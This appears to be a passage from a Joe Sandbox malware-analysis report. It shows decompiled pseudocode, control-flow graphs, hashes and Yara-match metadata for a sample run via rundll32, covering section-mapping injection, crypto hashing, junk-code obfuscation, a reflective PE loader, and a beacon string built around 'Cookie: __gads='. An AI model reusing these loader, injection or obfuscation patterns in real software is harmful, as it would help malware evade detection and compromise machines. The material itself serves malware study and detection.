                                              control_flow_graph 147 7fef7535ff9-7fef753600f 148 7fef75361b7-7fef75361cc 147->148 149 7fef75361ce-7fef75361d7 148->149 150 7fef75361e1-7fef75361f7 148->150 151 7fef753666d 149->151 152 7fef7536173-7fef7536188 150->152 153 7fef75361fd-7fef753620c 150->153 154 7fef7536594-7fef753659a 151->154 155 7fef753619f-7fef75361aa 152->155 156 7fef753618a-7fef7536192 152->156 157 7fef753620e-7fef7536215 NtCreateSection 153->157 158 7fef753624b-7fef753625b 153->158 159 7fef7536681 154->159 155->148 160 7fef7536194-7fef753619a 156->160 161 7fef753616d-7fef7536171 156->161 157->154 162 7fef753621e-7fef753622d 158->162 163 7fef753625d-7fef753626f 158->163 164 7fef7536685-7fef753668a 159->164 160->164 166 7fef7536691-7fef7536696 160->166 161->149 162->163 165 7fef753622f-7fef753623a 162->165 163->165 169 7fef7536672 164->169 170 7fef753668c 164->170 171 7fef75366c5-7fef75366d2 165->171 167 7fef7536677-7fef753667c 166->167 168 7fef7536698-7fef75366a0 166->168 167->159 172 7fef753676a-7fef7536777 call 7fef7537947 167->172 168->164 169->159 170->170 173 7fef75366d4-7fef75366db 171->173 174 7fef75366a7-7fef75366bb NtMapViewOfSection 171->174 178 7fef7536740-7fef7536750 172->178 179 7fef7536779-7fef7536789 172->179 174->171 181 7fef7536752-7fef7536759 178->181 182 7fef7536731-7fef753673e call 7fef7537947 178->182 185 7fef75366f2-7fef753671d 179->185 181->151 182->178 188 7fef753671f-7fef753672f 182->188 185->179 185->188 188->182 189 7fef753675e-7fef7536768 call 7fef7537947 188->189 189->172 189->185
                                              C-Code - Quality: 100%
                                              			E000007FE7FEF7535FF9(void* __eax, void* __ebx, void* __ecx, void* __edx, void* __rdx, void* __r10, void* __r11, void* __r15, signed int _a80, intOrPtr _a308, intOrPtr _a312, intOrPtr _a316, intOrPtr _a320, intOrPtr _a324, intOrPtr _a328, intOrPtr _a332, intOrPtr _a336, intOrPtr _a340, intOrPtr _a344) {
				intOrPtr _t40;
				void* _t57;

				_a344 = 0x18f;
				_a344 = _a344 + 0xff;
				_a324 = 0x1d29;
				_a324 = _a324 + 0x3c;
				if (__ecx == __ecx) goto 0xf7536042;
				_a336 = 0x7b;
				_a336 = _a336;
				if (__edx == __edx) goto 0xf753608a;
				_a328 = 6;
				_a328 = _a328 + 0x27;
				if (__ebx == __ebx) goto 0xf7536059;
				_a332 = 0x35;
				_a332 = _a332 + 0x17;
				if (__eax == __eax) goto 0xf753602b;
				_a312 = 0x19cc;
				_a312 = _a312 + 0xa0;
				if (__ebx == __ebx) goto 0xf75360a5;
				_a340 = 0xd9;
				_a340 = _a340 + 0x81;
				goto E000007FE7FEF7535FF9;
				_a316 = 0x5c;
				_a316 = _a316 + 0x8f;
				if (__ecx == __ecx) goto 0xf75360d7;
				_a308 = 7;
				_a308 = _a308 + 0x12;
				if (__ecx == __ecx) goto 0xf7536070;
				_a320 = 0x24b;
				_a320 = _a320 + 0x30;
				if (__edx == __edx) goto L1;
				_t40 =  *((intOrPtr*)(_t57 + 0x70 + _a80 * 4));
				if (_t40 - 0x1f4 <= 0) goto 0xf75360f2;
				return _t40;
			}





                                              0x7fef7535ff9
                                              0x7fef7536004
                                              0x7fef7536014
                                              0x7fef753601f
                                              0x7fef7536029
                                              0x7fef753602b
                                              0x7fef7536036
                                              0x7fef7536040
                                              0x7fef7536042
                                              0x7fef753604d
                                              0x7fef7536057
                                              0x7fef7536059
                                              0x7fef7536064
                                              0x7fef753606e
                                              0x7fef7536070
                                              0x7fef753607b
                                              0x7fef7536088
                                              0x7fef753608a
                                              0x7fef7536095
                                              0x7fef75360a0
                                              0x7fef75360a5
                                              0x7fef75360b0
                                              0x7fef75360be
                                              0x7fef75360c0
                                              0x7fef75360cb
                                              0x7fef75360d5
                                              0x7fef75360d7
                                              0x7fef75360e2
                                              0x7fef75360ec
                                              0x7fef75360f7
                                              0x7fef7536105
                                              0x7fef753611b

                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.944274000.000007FEF7531000.00000020.00000001.01000000.00000004.sdmp, Offset: 000007FEF7530000, based on PE: true
                                              • Associated: 00000005.00000002.944267845.000007FEF7530000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000005.00000002.944315478.000007FEF7589000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_7fef7530000_rundll32.jbxd
                                              Similarity
                                              • API ID: CreateSection
                                              • String ID: $$'$<
                                              • API String ID: 2449625523-1052150772
                                              • Opcode ID: a827bfe900c49c1c2808823daf063abfa26f5a14f1beb8bf1ce44c1864846899
                                              • Instruction ID: 1d446540bbbf3a4f3d84ffa38f120e57b627df9f1bf22c920460f5d7b654e3cd
                                              • Opcode Fuzzy Hash: a827bfe900c49c1c2808823daf063abfa26f5a14f1beb8bf1ce44c1864846899
                                              • Instruction Fuzzy Hash: D521ECB691C2C2CBF6F08B14A4483BAB7E2E384354F500539EA8A469B9D77DD4449F41
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 000007FEF7535FE6 Relevance: 3.0, APIs: 2, Instructions: 40nativeCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 335 7fef7535fe6-7fef7535feb 336 7fef7535fdd-7fef7535fe1 335->336 337 7fef7535fed-7fef753620c 335->337 338 7fef75366d4-7fef75366db 336->338 340 7fef753620e-7fef753659a NtCreateSection 337->340 341 7fef753624b-7fef753625b 337->341 345 7fef7536681-7fef753668a 340->345 342 7fef753621e-7fef753622d 341->342 343 7fef753625d-7fef753626f 341->343 342->343 346 7fef753622f-7fef753623a 342->346 343->346 349 7fef7536672 345->349 350 7fef753668c 345->350 348 7fef75366c5-7fef75366d2 346->348 348->338 351 7fef75366a7-7fef75366bb NtMapViewOfSection 348->351 349->345 350->350 351->348
                                              C-Code - Quality: 100%
                                              			E000007FE7FEF7535FE6(void* __ebx, void* __ecx, void* __edx, void* __rdx, void* __r10, void* __r11, void* __r15, signed int _a80, intOrPtr _a88, intOrPtr _a308, intOrPtr _a312, intOrPtr _a316, intOrPtr _a320, intOrPtr _a324, intOrPtr _a328, intOrPtr _a332, intOrPtr _a336, intOrPtr _a340, intOrPtr _a344, intOrPtr _a448) {
				intOrPtr _t41;

				if (_a88 < 0) goto 0xf7535fdd;
				_t41 = _a448;
				_a344 = 0x18f;
				_a344 = _a344 + 0xff;
				_a324 = 0x1d29;
				_a324 = _a324 + 0x3c;
				if (__ecx == __ecx) goto 0xf7536042;
				_a336 = 0x7b;
				_a336 = _a336;
				if (__edx == __edx) goto 0xf753608a;
				_a328 = 6;
				_a328 = _a328 + 0x27;
				if (__ebx == __ebx) goto 0xf7536059;
				_a332 = 0x35;
				_a332 = _a332 + 0x17;
				if (_t41 == _t41) goto 0xf753602b;
				_a312 = 0x19cc;
				_a312 = _a312 + 0xa0;
				if (__ebx == __ebx) goto 0xf75360a5;
				_a340 = 0xd9;
				_a340 = _a340 + 0x81;
				goto L1;
				_a316 = 0x5c;
				_a316 = _a316 + 0x8f;
				if (__cx == __cx) goto 0xf75360d7;
				_a308 = 7;
				_a308 = _a308 + 0x12;
				if (__ch == __ch) goto 0xf7536070;
				_a320 = 0x24b;
				_a320 = _a320 + 0x30;
				if (__dl == __dl) goto L2;
				__eax =  *((intOrPtr*)(__rsp + 0x70 + _a80 * 4));
				if (__eax - 0x1f4 <= 0) goto 0xf75360f2;
				_t38 = __r10;
				__r10 = __rsp;
				__rsp = _t38;
				__r11 = __r11 << 0x40;
				return __eax;
			}




                                              0x7fef7535feb
                                              0x7fef7535fed
                                              0x7fef7535ff9
                                              0x7fef7536004
                                              0x7fef7536014
                                              0x7fef753601f
                                              0x7fef7536029
                                              0x7fef753602b
                                              0x7fef7536036
                                              0x7fef7536040
                                              0x7fef7536042
                                              0x7fef753604d
                                              0x7fef7536057
                                              0x7fef7536059
                                              0x7fef7536064
                                              0x7fef753606e
                                              0x7fef7536070
                                              0x7fef753607b
                                              0x7fef7536088
                                              0x7fef753608a
                                              0x7fef7536095
                                              0x7fef75360a0
                                              0x7fef75360a5
                                              0x7fef75360b0
                                              0x7fef75360be
                                              0x7fef75360c0
                                              0x7fef75360cb
                                              0x7fef75360d5
                                              0x7fef75360d7
                                              0x7fef75360e2
                                              0x7fef75360ec
                                              0x7fef75360f7
                                              0x7fef7536105
                                              0x7fef753610e
                                              0x7fef753610e
                                              0x7fef753610e
                                              0x7fef7536116
                                              0x7fef753611b

                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.944274000.000007FEF7531000.00000020.00000001.01000000.00000004.sdmp, Offset: 000007FEF7530000, based on PE: true
                                              • Associated: 00000005.00000002.944267845.000007FEF7530000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000005.00000002.944315478.000007FEF7589000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_7fef7530000_rundll32.jbxd
                                              Similarity
                                              • API ID: CreateSection
                                              • String ID:
                                              • API String ID: 2449625523-0
                                              • Opcode ID: 8b32971e4af457eda586907c53b90aeb09a8bd07261add21a48acce25afcaa35
                                              • Instruction ID: ca76910b85062f20d989a0bad71702730f028c68b2272f37a84166c3da266900
                                              • Opcode Fuzzy Hash: 8b32971e4af457eda586907c53b90aeb09a8bd07261add21a48acce25afcaa35
                                              • Instruction Fuzzy Hash: 6B119B72A1C6C5C6F7F09B54E0547AAA7E3F384394F501039FA8A46AB8D77DD5448B01
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 000007FEF7532CF7 Relevance: 3.0, APIs: 2, Instructions: 27encryptionCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 353 7fef7532cf7-7fef7532cff 354 7fef7532d01-7fef7532d0d CryptAcquireContextW 353->354 355 7fef7532cda-7fef7532cf2 CryptCreateHash 353->355 357 7fef7532faa-7fef7532fc4 354->357 358 7fef7532fb9-7fef7532fbb 354->358 359 7fef753313c-7fef753313e 355->359 358->357 360 7fef7532fbd-7fef7532fbf 358->360 362 7fef7533134 359->362 363 7fef7533140-7fef7533142 359->363 360->359 361 7fef7533283 360->361 366 7fef7533352-7fef7533368 361->366 362->359 363->361 367 7fef753336a-7fef7533380 366->367 368 7fef7533307-7fef753331c 366->368 369 7fef75332ab-7fef75332c1 367->369 370 7fef7533386-7fef753338e 367->370 371 7fef7533322-7fef7533338 368->371 372 7fef753328f-7fef75332a5 368->372 373 7fef75332c3-7fef75332cb 369->373 374 7fef753333a-7fef7533350 369->374 376 7fef753339e-7fef75333b4 370->376 371->374 375 7fef75332f0-7fef7533305 371->375 372->367 372->369 377 7fef75332db-7fef75332ee 373->377 374->366 374->371 375->368 375->377 378 7fef75333d0-7fef75333e6 376->378 379 7fef75333b6-7fef75333ce 376->379 377->373 381 7fef7533450-7fef7533465 378->381 382 7fef75333e8-7fef75333fd 378->382 379->378 380 7fef75333ff-7fef7533417 379->380 380->382 384 7fef7533419-7fef753342f 380->384 381->379 383 7fef753346b-7fef7533483 381->383 382->380 382->383 383->384 386 7fef7533485-7fef75335d5 383->386 384->370 385 7fef7533434-7fef753344a 384->385 385->376 385->381 391 7fef7533631-7fef7533647 386->391 392 7fef75335d7-7fef75335ed 386->392 391->392 393 7fef7533649-7fef753364b 391->393 394 7fef75335ef-7fef75335f5 392->394 395 7fef75335f7-7fef75335ff 392->395 394->393 394->395 396 7fef7533607 395->396 396->396
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.944274000.000007FEF7531000.00000020.00000001.01000000.00000004.sdmp, Offset: 000007FEF7530000, based on PE: true
                                              • Associated: 00000005.00000002.944267845.000007FEF7530000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000005.00000002.944315478.000007FEF7589000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_7fef7530000_rundll32.jbxd
                                              Similarity
                                              • API ID: Crypt$AcquireContextCreateHash
                                              • String ID:
                                              • API String ID: 1914063823-0
                                              • Opcode ID: 9328c7aaf945543188686a8cb83c328452d0d61bf2d104c301b4851cb1c44e76
                                              • Instruction ID: a67fd344e1d05935e3801df255800a01c5641867fe5a24e33360d5b55ffda2a7
                                              • Opcode Fuzzy Hash: 9328c7aaf945543188686a8cb83c328452d0d61bf2d104c301b4851cb1c44e76
                                              • Instruction Fuzzy Hash: 2AF01222F2C94792F7F08751E41177E52E3E795340F544431BE8F829F8EA3DE9569A00
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 000007FEF7532CCA Relevance: 1.6, APIs: 1, Instructions: 65encryptionCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 437 7fef7532cca-7fef7532f9d CryptCreateHash 439 7fef7532f9f-7fef75330f4 437->439 440 7fef7532f68-7fef7533283 437->440 443 7fef7533116-7fef7533128 439->443 444 7fef75330f6 439->444 461 7fef7533352-7fef7533368 440->461 446 7fef7533698-7fef75336a2 443->446 444->444 447 7fef75336a4-7fef75336ae 446->447 448 7fef75336b0-7fef75336bf call 7fef7537947 446->448 447->448 450 7fef75336c1-7fef75336ce 447->450 448->447 448->450 453 7fef753367f-7fef7533696 450->453 454 7fef75336d0-7fef75336d5 450->454 453->446 458 7fef7533671-7fef753367d 453->458 459 7fef75336dd-7fef75336e5 454->459 458->453 458->459 459->454 462 7fef753336a-7fef7533380 461->462 463 7fef7533307-7fef753331c 461->463 464 7fef75332ab-7fef75332c1 462->464 465 7fef7533386-7fef753338e 462->465 466 7fef7533322-7fef7533338 463->466 467 7fef753328f-7fef75332a5 463->467 468 7fef75332c3-7fef75332cb 464->468 469 7fef753333a-7fef7533350 464->469 471 7fef753339e-7fef75333b4 465->471 466->469 470 7fef75332f0-7fef7533305 466->470 467->462 467->464 472 7fef75332db-7fef75332ee 468->472 469->461 469->466 470->463 470->472 473 7fef75333d0-7fef75333e6 471->473 474 7fef75333b6-7fef75333ce 471->474 472->468 476 7fef7533450-7fef7533465 473->476 477 7fef75333e8-7fef75333fd 473->477 474->473 475 7fef75333ff-7fef7533417 474->475 475->477 479 7fef7533419-7fef753342f 475->479 476->474 478 7fef753346b-7fef7533483 476->478 477->475 477->478 478->479 481 7fef7533485-7fef75335d5 478->481 479->465 480 7fef7533434-7fef753344a 479->480 480->471 480->476 486 7fef7533631-7fef7533647 481->486 487 7fef75335d7-7fef75335ed 481->487 486->487 488 7fef7533649-7fef753364b 486->488 489 7fef75335ef-7fef75335f5 487->489 490 7fef75335f7-7fef75335ff 487->490 489->488 489->490 491 7fef7533607 490->491 491->491
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.944274000.000007FEF7531000.00000020.00000001.01000000.00000004.sdmp, Offset: 000007FEF7530000, based on PE: true
                                              • Associated: 00000005.00000002.944267845.000007FEF7530000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000005.00000002.944315478.000007FEF7589000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_7fef7530000_rundll32.jbxd
                                              Similarity
                                              • API ID: CreateCryptHash
                                              • String ID:
                                              • API String ID: 4184778727-0
                                              • Opcode ID: 1b2df4a2d971ec85693729c80128cdf9c680fc0664a4aaac409bd98b765b1bdf
                                              • Instruction ID: 9dece2cc3ce22c78f6b74a853dc3b873818608cb0a77919127c1c58cb6f9399c
                                              • Opcode Fuzzy Hash: 1b2df4a2d971ec85693729c80128cdf9c680fc0664a4aaac409bd98b765b1bdf
                                              • Instruction Fuzzy Hash: 4A218362F3C5828AF7F09A54D44537A52E2E790300F944039FE8F8B7B4EA3EE8458B01
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 000007FEF7532CDA Relevance: 1.5, APIs: 1, Instructions: 13encryptionCOMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.944274000.000007FEF7531000.00000020.00000001.01000000.00000004.sdmp, Offset: 000007FEF7530000, based on PE: true
                                              • Associated: 00000005.00000002.944267845.000007FEF7530000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000005.00000002.944315478.000007FEF7589000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_7fef7530000_rundll32.jbxd
                                              Similarity
                                              • API ID: CreateCryptHash
                                              • String ID:
                                              • API String ID: 4184778727-0
                                              • Opcode ID: 6c0d0b01144992e9ee5506c314bfe315ee5ded7aa6eeff1a2f840e8b65ebe874
                                              • Instruction ID: c46d6e76456a39ad5920a08452d4907459b898345f2ebbc12925c1e1c41d3ae5
                                              • Opcode Fuzzy Hash: 6c0d0b01144992e9ee5506c314bfe315ee5ded7aa6eeff1a2f840e8b65ebe874
                                              • Instruction Fuzzy Hash: 8BD0C912F2DA4B82F7F44652A91073A46D3BBE1345F249031BD4E469F8DD3CF8529640
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0000000180002860 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 65memoryCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              C-Code - Quality: 40%
                                              			E00000001180002860(void* __ecx, void* __edx, void* __edi, long long* __rax, long long __rbx, long long __rsi, long long __rbp, void* __r8, void* __r9, long long _a8, long long _a16, long long _a24) {
				void* __rdi;
				int _t23;
				int _t24;
				void* _t30;
				long long* _t41;
				void* _t46;
				signed long long _t47;
				signed long long _t48;
				long long* _t69;
				void* _t71;

				_t41 = __rax;
				_a8 = __rbx;
				_a16 = __rbp;
				_a24 = __rsi;
				_t71 = __r8;
				GetProcessHeap();
				r8d = 0x2001;
				RtlAllocateHeap(??, ??, ??); // executed
				_t69 = __rax;
				if (__rax == 0) goto 0x80002959;
				r9d = __ecx;
				_t23 = wsprintfW(??, ??);
				r9d = __edx;
				_t24 = wsprintfW(??, ??);
				r9d = E00000001180001484(_t24, __rax, L"%s%u");
				_t46 = _t23 + _t24 + wsprintfW(??, ??);
				r9d = E0000000118000108C(__rax, _t46, __r8);
				_t47 = _t46 + wsprintfW(??, ??);
				E00000001180001904(__rax, _t47, __rax + _t47 * 2, _t71);
				_t48 = _t47 + __rax;
				_t30 = E000000011800027B4(__rax, _t48, __rax + _t48 * 2);
				_t49 = _t48 + __rax;
				E00000001180002018(_t30, _t48 + __rax, __rax + (_t48 + __rax) * 2, _t71, __rax, _t71);
				return E0000000118000133C(_t49 + _t41, _t69 + (_t49 + _t41) * 2, _t71, ":");
			}













                                              0x180002860
                                              0x180002860
                                              0x180002865
                                              0x18000286a
                                              0x180002874
                                              0x18000287b
                                              0x180002886
                                              0x18000288f
                                              0x180002895
                                              0x18000289b
                                              0x1800028a1
                                              0x1800028b5
                                              0x1800028be
                                              0x1800028d6
                                              0x1800028eb
                                              0x180002901
                                              0x18000290d
                                              0x180002923
                                              0x18000292a
                                              0x18000292f
                                              0x180002936
                                              0x18000293b
                                              0x180002945
                                              0x18000296d

                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.944227549.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                              • Associated: 00000005.00000002.944213734.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.944232122.0000000180004000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.944235804.0000000180006000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.944239829.0000000180008000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: wsprintf$Heap$Process$AddressLibraryLoadProc$AdaptersAllocInfoName$AllocateComputerCount64FreeInformationQuerySystemTickUser
                                              • String ID: %s%u$Cookie: __gads=
                                              • API String ID: 392523097-3007860590
                                              • Opcode ID: 331763b53d6f8557935e9ebf42fdd2c7f373a1b19adadbe0eaccf4172c03b777
                                              • Instruction ID: 8f6dff4a45bc758f9ad86f1329c8408aa2d07b8871dc2bc0e96f96c00fe38273
                                              • Opcode Fuzzy Hash: 331763b53d6f8557935e9ebf42fdd2c7f373a1b19adadbe0eaccf4172c03b777
                                              • Instruction Fuzzy Hash: 2C214872740A0996EB92DB55F8543E87360BB5CBC1F848129AB4D57772EE3CC62DC340
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0000000180001BD4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 22libraryloaderCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 143 180001bd4-180001c0c LoadLibraryA GetProcAddress 145 180001c15-180001c25 143->145 146 180001c0e-180001c13 GetNativeSystemInfo 143->146 146->145
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.944227549.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                              • Associated: 00000005.00000002.944213734.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.944232122.0000000180004000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.944235804.0000000180006000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.944239829.0000000180008000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: AddressInfoLibraryLoadNativeProcSystem
                                              • String ID: GetNativeSystemInfo$KERNEL32.DLL
                                              • API String ID: 2103483237-4162215167
                                              • Opcode ID: 422b05c43dcb4eb9de9b7d23b9406151622cf17c3d48ce90b7700ffe9165f4bc
                                              • Instruction ID: 8e61e42ac17d5e92d5409a7507b4c0ea04a19fa1e2651f3f55c474f49308d06d
                                              • Opcode Fuzzy Hash: 422b05c43dcb4eb9de9b7d23b9406151622cf17c3d48ce90b7700ffe9165f4bc
                                              • Instruction Fuzzy Hash: 0BE06D72B24509D2EB93EB20E8543D93360FB9C780F848221A54E026A4EF2CD78DC740
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 002A0000 Relevance: 6.7, APIs: 4, Instructions: 735memorylibraryCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 192 2a0000-2a008f call 2a0618 * 6 205 2a05fa 192->205 206 2a0095-2a0098 192->206 207 2a05fc-2a0616 205->207 206->205 208 2a009e-2a00a1 206->208 208->205 209 2a00a7-2a00aa 208->209 209->205 210 2a00b0-2a00b3 209->210 210->205 211 2a00b9-2a00bc 210->211 211->205 212 2a00c2-2a00d0 211->212 212->205 213 2a00d6-2a00df 212->213 213->205 214 2a00e5-2a00ed 213->214 214->205 215 2a00f3-2a0101 214->215 216 2a0103-2a0108 215->216 217 2a0127-2a0159 GetNativeSystemInfo 215->217 218 2a010b-2a0125 216->218 217->205 219 2a015f-2a017b VirtualAlloc 217->219 218->217 218->218 220 2a017d-2a0190 219->220 221 2a0192-2a019d 219->221 220->221 222 2a019f-2a01ae 221->222 223 2a01b0-2a01cc 221->223 222->222 222->223 225 2a020a-2a0217 223->225 226 2a01ce-2a01cf 223->226 227 2a021d-2a0224 225->227 228 2a02d2-2a02d9 225->228 229 2a01d1-2a01d7 226->229 227->228 230 2a022a-2a0237 227->230 231 2a02db-2a02eb 228->231 232 2a0345-2a034c 228->232 233 2a01f9-2a0208 229->233 234 2a01d9-2a01f7 229->234 230->228 235 2a023d-2a0244 230->235 231->232 236 2a02ed-2a02ee 231->236 237 2a034e-2a0361 232->237 238 2a03c0-2a03d1 232->238 233->225 233->229 234->233 234->234 240 2a0247-2a024b 235->240 241 2a02f1-2a030a LoadLibraryA 236->241 237->238 239 2a0363-2a0364 237->239 242 2a04e1-2a04fa 238->242 243 2a03d7-2a03e0 238->243 244 2a0367-2a0380 239->244 245 2a02ba-2a02c4 240->245 246 2a032c-2a0332 241->246 262 2a04fc-2a0504 242->262 263 2a0521-2a0525 242->263 247 2a03e5-2a03e7 243->247 266 2a03a8-2a03ab 244->266 248 2a024d-2a0261 245->248 249 2a02c6-2a02cc 245->249 253 2a030c 246->253 254 2a0334-2a033f 246->254 250 2a04cc-2a04db 247->250 251 2a03ed-2a03f8 247->251 258 2a0263-2a0283 248->258 259 2a0285-2a0289 248->259 249->228 249->240 250->242 250->247 255 2a03fa-2a03fd 251->255 256 2a0411-2a0413 251->256 260 2a030e-2a0311 253->260 261 2a0313-2a0318 253->261 254->241 264 2a0341-2a0342 254->264 255->256 265 2a03ff-2a0401 255->265 267 2a044e-2a0451 256->267 268 2a0415-2a0418 256->268 269 2a02b7-2a02b8 258->269 271 2a028b-2a028d 259->271 272 2a028f-2a0293 259->272 270 2a031a-2a0329 260->270 261->270 273 2a0508-2a050e 262->273 274 2a0527-2a0540 263->274 275 2a0544-2a054b 263->275 264->232 265->256 280 2a0403-2a040c 265->280 287 2a03ad-2a03ba 266->287 288 2a0382-2a0389 266->288 278 2a045f-2a0461 267->278 279 2a0453-2a0455 267->279 281 2a041a-2a041c 268->281 282 2a0424-2a0426 268->282 269->245 270->246 283 2a02aa-2a02b4 271->283 284 2a02a1-2a02a5 272->284 285 2a0295-2a029f 272->285 273->263 286 2a0510-2a051f 273->286 274->275 276 2a0551-2a0569 275->276 277 2a05f5-2a05f8 275->277 293 2a057b-2a058b 276->293 294 2a056b-2a0579 276->294 277->207 296 2a0463-2a0466 278->296 297 2a04a7-2a04a8 278->297 279->278 295 2a0457-2a045d 279->295 289 2a04ab-2a04b2 280->289 281->282 290 2a041e-2a0422 281->290 282->267 291 2a0428-2a042b 282->291 283->269 284->269 300 2a02a7 284->300 285->283 286->273 287->244 301 2a03bc-2a03bd 287->301 298 2a038b-2a038e 288->298 299 2a0390-2a0395 288->299 302 2a04bd-2a04ca VirtualProtect 289->302 303 2a04b4-2a04ba 289->303 304 2a0487-2a048b 290->304 305 2a042d-2a042f 291->305 306 2a0437-2a0439 291->306 293->277 308 2a058d-2a058e 293->308 294->293 294->294 295->304 309 2a0468-2a046a 296->309 310 2a0474-2a0476 296->310 297->289 311 2a0397-2a03a5 298->311 299->311 300->283 301->238 302->250 303->302 304->289 305->306 312 2a0431-2a0435 305->312 306->267 313 2a043b-2a043e 306->313 314 2a0590-2a0594 308->314 309->310 315 2a046c-2a0472 309->315 310->297 316 2a0478-2a047b 310->316 311->266 312->304 317 2a044a-2a044c 313->317 318 2a0440-2a0442 313->318 319 2a0596-2a05a0 314->319 320 2a05b5-2a05b8 314->320 315->304 322 2a048d-2a048f 316->322 323 2a047d-2a047f 316->323 317->267 317->297 318->317 324 2a0444-2a0448 318->324 325 2a05a3-2a05b3 319->325 326 2a05ba-2a05bd 320->326 327 2a05bf-2a05c3 320->327 322->297 329 2a0491-2a0494 322->329 323->322 328 2a0481-2a0482 323->328 324->304 325->320 325->325 326->327 330 2a05d3-2a05e2 326->330 331 2a05e5-2a05f3 327->331 332 2a05c5-2a05cf 327->332 328->304 329->297 333 2a0496-2a04a5 329->333 330->331 331->277 332->277 334 2a05d1 332->334 333->304 334->314
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.943981609.00000000002A0000.00000040.10000000.00040000.00000000.sdmp, Offset: 002A0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_2a0000_rundll32.jbxd
                                              Similarity
                                              • API ID: Virtual$AllocInfoLibraryLoadNativeProtectSystem
                                              • String ID:
                                              • API String ID: 395219687-0
                                              • Opcode ID: dd72a9d3825b757cb599c52874617b57d3dfc330cdb9a130d1801265dc8a93a8
                                              • Instruction ID: 46209ff592ff3be5724ea051c5ae86dc04102a47c50df4eb4c50fe123b7af696
                                              • Opcode Fuzzy Hash: dd72a9d3825b757cb599c52874617b57d3dfc330cdb9a130d1801265dc8a93a8
                                              • Instruction Fuzzy Hash: E8121930A38F0A8FDB289E58D8D5675B3D1FB5A311B68456DD98BC3202EE34EC538685
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0000000180001318 Relevance: 3.0, APIs: 2, Instructions: 8COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 397 180001318-18000131c 398 180001329-180001330 397->398 399 180001332-180001334 ExitProcess 398->399 400 18000131e-180001323 SleepEx 398->400 400->398
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.944227549.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                              • Associated: 00000005.00000002.944213734.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.944232122.0000000180004000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.944235804.0000000180006000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.944239829.0000000180008000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ExitProcessSleep
                                              • String ID:
